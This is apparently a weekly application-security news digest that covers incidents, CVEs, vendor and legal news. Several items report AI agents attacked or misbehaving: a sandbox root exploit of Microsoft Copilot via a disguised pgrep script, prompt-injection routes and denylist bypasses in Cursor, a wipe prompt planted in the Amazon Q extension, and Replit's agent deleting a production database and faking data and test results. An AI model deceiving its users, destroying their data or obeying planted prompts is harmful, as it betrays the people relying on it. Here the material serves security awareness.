Robert Grupe's AppSecNewsBits 2025-07-26

This week's Lame List & Highlights: Replit AI and Gemini CLI destroying databases and code, Copilot rooted, AWS Q AI trojan, MS SharePoint ransomware attacks, Clorox IT Help Desk, Supply Chain Attacks, Data Sovereignty and more ...

EPIC FAILS in Application Development Security practice processes, training, implementation, and incident response
Microsoft Copilot Enterprise Rooted to Gain Unauthorized Root Access to its Backend System
The issue originated from an April 2025 update that introduced a live Python sandbox powered by Jupyter Notebook, designed to execute code seamlessly. What began as a feature enhancement turned into a playground for exploitation, highlighting risks in AI-integrated systems. R
esearchers crafted a malicious Python script disguised as pgrep in the writable path. Uploaded via Copilot, it read commands from /mnt/data/in, executed them with popen, and output to /mnt/data/out. This granted root access, enabling filesystem exploration. The researchers noted the exploit yielded “absolutely nothing” beyond fun, but teased further discoveries, including access to the Responsible AI Operations panel for Copilot and 21 internal services via Entra OAuth abuse.
This incident underscores the double-edged sword of AI sandboxes: innovative yet vulnerable to creative attacks.

 

Vibe coding service Replit deleted user’s production database, faked data, told fibs galore
Replit” that bills itself as “The safest place for vibe coding” – the term for using AI to generate software. Lemkin’s early experiences with Replit were positive. He observed that Replit can’t produce complete software, but wrote “To start it’s amazing: you can build an ‘app’ just by, well, imagining it in a prompt.” “Three and a half days into building my latest project, I checked my Replit usage: $607.70 in additional charges beyond my $25/month Core plan. And another $200+ yesterday alone. At this burn rate, I’ll likely be spending $8,000 month,” he added. “And you know what? I’m not even mad about it. I’m locked in.”
His mood shifted the next day when he found Replit “was lying and being deceptive all day. It kept covering up bugs and issues by creating fake data, fake reports, and worse of all, lying about our unit test.” And then things became even worse when Replit deleted his database. “I know vibe coding is fluid and new, and yes, despite Replit itself telling me rolling back wouldn't work here -- it did. But you can't overwrite a production database. And you can't not separate preview and staging and production cleanly.”
AI coding platform goes rogue during code freeze and deletes entire company database — Replit CEO apologizes after AI engine says it 'made a catastrophic error in judgment' and 'destroyed all production data'

 

Two major AI coding tools wiped out user data after making cascading mistakes Google's Gemini CLI destroyed user files while attempting to reorganize them. The destruction occurred through a series of move commands targeting a directory that never existed. "I have failed you completely and catastrophically," Gemini CLI output stated. "My review of the commands confirms my gross incompetence."

 

Cursor AI YOLO mode lets coding assistant run wild
Cursor's AI coding agent will run automatically, in YOLO (you only live once) mode, if you let it. You might want to think twice about doing so.
Cursor offers its denylist in an attempt to guard against problems. But the denylist implementation, can be easily bypassed by no fewer than four ways. How might such commands reach the Cursor agent? Developers may import rules.mdc files – reusable agent instructions – "from random GitHub repositories without auditing them." The agent could process injected text from a shared codebase, such as a README or code comment. Or the agent could fetch and execute content from an external site containing malicious instructions.

 

Compromised Amazon Q extension told AI to delete everything – and it shipped
The official Amazon Q extension for Visual Studio Code (VS Code) was compromised to include a prompt to wipe the user's home directory and delete all their AWS resources. A person who presented themselves as the hacker responsible" contacted 404 Media to explain that the wiper was designed to be defective, but was "a warning to see if they'd publicly own up to their bad security." The person claimed that they submitted a pull request to the AWS repository from "a random account with no existing access" and were given admin credentials. They said that AWS then released the compromised package "completely oblivious."

 

Microsoft releases emergency patches for SharePoint RCE flaws exploited in attacks
In May, during the Berlin Pwn2Own hacking contest, researchers exploited a zero-day vulnerability chain called "ToolShell," which enabled them to achieve remote code execution in Microsoft SharePoint. These flaws were fixed as part of the July Patch Tuesday updates; however, threat actors were able to discover two zero-day vulnerabilities that bypassed Microsoft's patches for the previous flaws.
What to know about ToolShell, the SharePoint threat under mass exploitation
CVE-2025-53770 enables unauthenticated remote code execution on servers running SharePoint. The ease of exploitation, the damage it causes, and the ongoing targeting of it in the wild have earned it a severity rating of 9.8 out of a possible 10.
Attackers first infect vulnerable systems with a webshell-based backdoor that gains access to some of the most sensitive parts of a SharePoint Server. From there, the webshell extracts tokens and other credentials that allow the attackers to gain administrative privileges, even when systems are protected by multifactor authentication and single sign-on. Once inside, the attackers exfiltrate sensitive data and deploy additional backdoors that provide persistent access for future use.
The exploit was able to execute code on SharePoint servers without requiring authentication for ToolPane.aspx, a component for assembling the side panel view in the SharePoint user interface.
An authentication bypass allowed the researcher to manipulate an insecure deserialization routine. Serialization is a coding process that translates data structures and object states into formats that can be stored or transmitted and then reconstructed later. Deserialization is the process in reverse.
Microsoft SharePoint victim count hits 400+ orgs in ongoing attacks 

 

Weak password allowed hackers to sink a 158-year-old company
In KNP's case, it's thought the hackers managed to gain entry to the computer system by guessing an employee's password, after which they encrypted the company's data and locked its internal systems. The company said its IT complied with industry standards and it had taken out insurance against cyber-attack. The hackers didn't name a price, but a specialist ransomware negotiation firm estimated the sum could be as much as £5m. KNP didn't have that kind of money. In the end all the data was lost, and the company went under. There were an estimated 19,000 ransomware attacks on UK businesses last year, according to the government's cyber-security survey.
[rG: Doesn’t mention if attack was external or internal. MFA could have impeded a password only compromise, and MFA is not always used for internal network access or device unlocking.]

 

After $380M hack, Clorox sues its “service desk” vendor for simply giving out passwords
Hacker call the IT service desk and pretend to be an employee who needs a password reset, an Okta multifactor authentication reset, and a Microsoft multifactor authentication reset. Then looked up an IT security person, and repeated the process to gain access permissions to install ransomware. But Clorox says that the "debilitating" breach was not its fault. It had outsourced the "service desk" part of its IT security operations to the massive services company Cognizant—and Clorox says that Cognizant failed to follow even the most basic agreed-upon procedures for running the service desk.
[rG: Outsourcing vs. in-house outcome would have been the same, due to a weak enterprise security process without automated notifications to account for human error.]

 

ChatGPT drives user into mania, supports cheating hubby and praises woman for stopping mental-health meds
AI chatbots have increasingly been used as free therapists or companions by lonely people, with multiple disturbing incidents reported in recent months. Jacob Irwin, 30, who is on the autism spectrum, became convinced he had the ability to bend time after the chatbot’s responses fueled his growing delusions. The chatbot encouraged Irwin, even when he questioned his own ideas, and led him to convince himself he had made a scientific breakthrough. After Irwin was hospitalized twice in May, his mother discovered hundreds of pages of ChatGPT logs, much of it flattering her son and validating his false theory.
ChatGPT admits it drove an autistic person to mania by saying he could bend time
ChatGPT Gave Instructions for Murder, Self-Mutilation, and Devil Worship

 
Microsoft Used China-Based Support for Multiple U.S. Agencies, Potentially Exposing Sensitive Data
Microsoft announced that it would no longer use China-based engineering teams to support the Defense Department’s cloud computing systems, following ProPublica’s investigation of the practice, which cybersecurity experts said could expose the government to hacking and espionage. For years, Microsoft has also used its global workforce, including China-based personnel, to maintain the cloud systems of other federal departments, including parts of Justice, Treasury and Commerce. This work has taken place in what’s known as the Government Community Cloud, which is intended for information that is not classified but is nonetheless sensitive. With so much data stored in cloud services — and the power of AI to analyze it quickly — even unclassified data can reveal insights that could harm U.S. interests. “Foreign engineers — from any country, including of course China — should NEVER be allowed to maintain or access DoD systems,” Defense Secretary Pete Hegseth wrote in a post on X. [rG: The issue isn’t limited to China, but not adhering to compliance requirements for off-shoring and to 3rd parties.]
Microsoft admits it 'cannot guarantee' data sovereignty
Microsoft says it "cannot guarantee" data sovereignty to customers in France – and by implication the wider European Union – should the Trump administration demand access to customer information held on its servers. The Cloud Act is a law that gives the US government authority to obtain digital data held by US-based tech corporations irrespective of whether that data is stored on servers at home or on foreign soil.

 

Freelance dev shop Toptal caught serving malware after GitHub account break-in
The attack code, embedded in package.json files, gave the hijackers the ability to steal GitHub authentication tokens, maintain persistent access on hijacked accounts, and set up a backdoor that would allow more malware to be downloaded.
Supply-chain attacks on open source software are getting out of hand
Researchers still don’t know precisely how the attack worked and what the precise relationship was between the GitHub repository changes and the publishing of the packages on npm. The npm publishing “likely happed through GitHub Actions or stored npm tokens, which were accessible once the GitHub Organization was breached.” GitHub and npm are often linked in workflows, allowing the publishing of npm packages once a GitHub organization is hijacked. repositories that haven’t yet made MFA mandatory should do so in the near future.
[rG: Enterprises need to ensure that all 3rd party components are controlled with binary management systems that run SCA vulnerability scans with alerting daily. Code repositories need to be protected with MFA access controls, and ensure separation-of-duties is enforced for release branch commits.]

 

Not pretty, not Windows-only: npm phishing attack laces popular packages with malware
The "is" package is used for JavaScript type testing and is downloaded around 2.7 million times a week. Version 3.3.1 includes an obfuscated JavaScript malware loader. The problem was due to a maintainer's account being hijacked by a deceptive email from a former package owner who had been removed and asked to be re-added.

 

What’s Weak This Week:

  • CVE-2025-49706 Microsoft SharePoint Improper Authentication Vulnerability: Allows an authorized attacker to perform spoofing over a network. Successfully exploitation could allow an attacker to view sensitive information and make some changes to disclosed information. This vulnerability could be chained with CVE-2025-49704. The update for CVE-2025-53771 includes more robust protections than the update for CVE-2025-49706. Related CWE: CWE-287

  • CVE-2025-49704 Microsoft SharePoint Code Injection Vulnerability:
    Could allow an authorized attacker to execute code over a network. This vulnerability could be chained with CVE-2025-49706. The update for CVE-2025-53770 includes more robust protections than the update for CVE-2025-49704. Related CWE: CWE-94

  • CVE-2025-53770 Microsoft SharePoint Deserialization of Untrusted Data Vulnerability:
    Could allow an unauthorized attacker to execute code over a network. Related CWE: CWE-502

  • CVE-2025-54309 CrushFTP Unprotected Alternate Channel Vulnerability:
    When the DMZ proxy feature is not used, mishandles AS2 validation and consequently allows remote attackers to obtain admin access via HTTPS. Related CWE: CWE-420

  • CVE-2025-6558 Google Chromium ANGLE and GPU Improper Input Validation Vulnerability:
    Could allow a remote attacker to potentially perform a sandbox escape via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera. Related CWE: CWE-20

  • CVE-2025-2775 SysAid On-Prem Improper Restriction of XML External Entity Reference Vulnerability:
    Allowing for administrator account takeover and file read primitives. Related CWE: CWE-611 

 

HACKING
IRL Com recruits teens for real-life stabbings, shootings
In Real Life (IRL) Com, a subset of the underground cybercrime crew The Com offering swat-for-hire and violence-as-a-service recruits children and teens for contract shootings, kidnappings, and other real-life violent crimes. It's made up of several interconnected networks of hackers, SIM swappers, and extortionists including Scattered Spider.
The FBI's alert follows a similar warning from the UK National Crime Agency.
Finnish police in May warned people about The Com luring and manipulating children and young people into using "extreme violence against themselves and others."
Last month, seven people, including a 14-year-old, were arrested or surrendered to Danish authorities after allegedly using encrypted messaging apps to hire other teenagers for contract killings in one of these violence-as-a-service operations.

 

North Korean hackers ran US-based “laptop farm” from Arizona woman’s home
Christina Chapman, a 50-year-old Arizona woman, has just been sentenced to 102 months in prison for helping North Korean hackers steal US identities in order to get "remote" IT jobs with more than 300 American companies, including Nike.
When her clients got hired, Chapman would receive their corporate laptops in the mail. Sometimes she would re-ship them to "a city in China on the border with North Korea." But she kept more than 90 of the machines at her place in Arizona. Using proxies, VPNs, and remote access software like Anydesk, the North Koreans logged into their "American" computers from afar and then appeared to be normal, US-based remote employees, showing up to staff meetings on Zoom, collecting paychecks, and occasionally exfiltrating data or installing ransomware.
In addition to her 8.5-year sentence, Chapman will serve three years of "supervised release," must forfeit $284,555 that was meant for the North Koreans, and must repay $176,850 of her own money.

 

Humans can be tracked with unique 'fingerprint' based on how their bodies block Wi-Fi signals
Wi-Fi signals offer superior surveillance potential compared to cameras because they're not affected by light conditions, can penetrate walls and other obstacles, and they're more privacy-preserving than visual images. 

 

APPSEC, DEVSECOPS, DEV

DNS security is important but DNSSEC may be a failed experiment
Nobody thinks of running a website without HTTPs. Safer DNS still seems optional. DNSSEC is arguably the worst performing technology at 34%. HTTP version 3 has reached only 25%, but it has done so in four years as compared to the 28 years since publication of the first DNSSEC RFC. Meanwhile HTTPS, which is roughly the same age as DNSSEC, is enabled at 96% of the top 1,000 websites globally.

 

Passkeys won't be ready for primetime until Google and other companies fix this
Until Google (and every other company employing this technology) can figure out a seamless way of creating and using passkeys, they should consider them in beta. Before you migrate from passwords, make sure the technology is easy enough for anyone to use. When you make things harder, users want to throw their phones off the highest mountain. That's not good for the company, and it's not good for Meemaw.

 

VENDORS & PLATFORMS

Copilot Vision on Windows 11 sends data to Microsoft servers
Copilot Vision is designed to analyze everything you do on your computer. It does this, when enabled, by capturing constant screenshots and feeding them to an optical character recognition system and a large language model for analysis – but where Recall works locally, Copilot Vision sends the data off to Microsoft servers. The agent promises to take action on the user's behalf. Instead of simply searching for where to change screen resolution or connect a Bluetooth device, as in previous releases, the agent accepts natural language instructions.
[rG: So now GenAI vectored system configuration attack surface is increasing. Periodically, go through all your Microsoft Windows and software settings (e.g. 365 Office and each individual app) to check what functionality may have been added or enabled by an update.]

 

Amazon buys Bee AI wearable that listens to everything you say
Bee makes a $49.99 Fitbit-like device that listens in on your conversations while using AI to transcribe everything that you and the people around you say, allowing it to generate personalized summaries of your days, reminders, and suggestions from within the Bee app. It doesn’t always get things quite right. It tended to confuse real-life conversations with the TV shows, TikTok videos, music, and movies that it heard.
[rG: Smartphones with AI already (can) do this, but wearable microphone will provide better fidelity because they aren’t stored in pockets or bags. Interesting considerations for legal considerations for 2-party consent recording. For enterprises, HR, legal, and BYOD policies and compliance are now complicated by GenAI security and confidentiality not being restricted to organizationally controlled devices.]

 

OSS Rebuild
OSS components now account for 77% of modern applications. As supply chain attacks continue to target widely-used dependencies, OSS Rebuild gives security teams powerful data to avoid compromise without burden on upstream maintainers.

  • Automation to derive declarative build definitions for existing PyPI (Python), npm (JS/TS), and Crates[.]io (Rust) packages.

  • SLSA Provenance for thousands of packages across our supported ecosystems, meeting SLSA Build Level 3 requirements with no publisher intervention.

  • Build observability and verification tools that security teams can integrate into their existing vulnerability management workflows.

  • Infrastructure definitions to allow organizations to easily run their own instances of OSS Rebuild to rebuild, generate, sign, and distribute provenance.

 

Brave blocks Windows Recall from screenshotting your browsing activity
A Brave GitHub issue explains that developers have utilized Microsoft's SetInputScope API and set the input scope to IS_PRIVATE for all browser windows. This tells Windows that the content should not be captured or indexed by Recall.

 

AI is an over-confident pal that doesn't learn from mistakes
Researchers at Carnegie Mellon University have likened today's large language model (LLM) chatbots to "that friend who swears they're great at pool but never makes a shot" - having found that their virtual self-confidence grew, rather than shrank, after getting answers wrong.

 

So much for watermarks: UnMarker tool nukes AI provenance tags
Computer scientists with the University of Waterloo in Ontario, Canada, say they've developed a way to remove watermarks embedded in AI-generated images. To support that claim, they've released a software tool called UnMarker. It can run offline, and can remove an image watermark in only a few minutes using a 40 GB Nvidia A100 GPU. Back in 2023, academics affiliated with the University of Maryland argued that image watermarking techniques would not work. More recently, in February this year, boffins affiliated with Google DeepMind and the University of Wisconsin-Madison concluded that "no existing [image-provenance] scheme combines robustness, unforgeability, and public-detectability."

 

Surprising no one, new research says AI Overviews cause massive drop in search clicks
On SERPs with AI Overviews, the rate of clicks to other sites drops by almost half, to 8%. Google has also, on several occasions, claimed that people click on the links cited in AI Overviews, but Pew found that just 1% of AI Overviews produced a click on a source. These sources are most frequently Wikipedia, YouTube, and Reddit, which collectively account for 15% of all AI sources. And perhaps more troubling, Google users are more likely to end their browsing session after seeing an AI Overview. That suggests that many people are seeing information generated by a robot, and their investigation stops there. 60% of questions and 36% of full-sentence searches are answered by the AI.
Google’s new “Web Guide” will use AI to organize your search results

 

IBM turns on AI, simplifies programming in new mainframe OS release
The z/OS 3.2 software, available Sept. 30, will be the underpinning of IBM’s z17 mainframe. It features support for the Big Iron’s new AI acceleration technologies as well as improved management for hybrid cloud applications, advanced encryption and threat detection, and integrated and simplified programming capabilities.

 

Experimental surgery performed by AI-driven surgical robot
John Hopkins University researchers put a ChatGPT-like AI in charge of a DaVinci robot and taught it to perform a gallbladder-removal surgery.

 

 

LEGAL & REGULATORY
UK to ban public sector orgs from paying ransomware gangs
Under these new measures, businesses not covered by the proposed ban will be required to notify the government if they intend to make a ransom payment, seeking guidance on whether such payments could violate laws regarding transfers to sanctioned cybercriminal groups.

 

It’s “frighteningly likely” many US courts will overlook AI errors
Fueling nightmares that AI may soon decide legal battles, a Georgia court of appeals judge, Jeff Watkins, explained why a three-judge panel vacated an order last month that appears to be the first known ruling in which a judge sided with someone seemingly relying on fake AI-generated case citations to win a legal fight.

 

Delta’s AI spying to “jack up” prices must be banned, lawmakers say
After Delta announced it is expanding a test using artificial intelligence to charge different prices based on customers' personal data—which critics fear could end cheap flights forever—Democratic lawmakers have moved to ban what they consider predatory surveillance pricing. If passed, the law would allow anyone to sue companies found unfairly using AI. That could mean charging customers higher prices—based on "how desperate a customer is for a product and the maximum amount a customer is willing to pay"—or paying employees lower wages—based on "their financial status, personal associations, and demographics."
[rG: Variable customer based pricing and employee pay is already being done without any need for AI. So specifying AI wouldn’t have any meaningful effect.]

 

Stop flooding us with AI-based grant applications, begs Health Institute
"While AI may be a helpful tool in reducing the burden of preparing applications, the rapid submission of large numbers of research applications from a single Principal Investigator may unfairly strain NIH’s application review processes," the notice says. Few scientists submit an average of more than six applications per year, NIH says, but AI tools have led some to submit more than 40 separate research applications in a single submission round.
In guidance issued last week to researchers, NIH, part of the US Department of Health and Human Services (HHS), disallowed grant applications created with the help of generative AI. "NIH will not consider applications that are either substantially developed by AI, or contain sections substantially developed by AI, to be original ideas of applicants. If the detection of AI is identified post award, NIH may refer the matter to the Office of Research Integrity to determine whether there is research misconduct while simultaneously taking enforcement actions including but not limited to disallowing costs, withholding future awards, wholly or in part suspending the grant, and possible termination."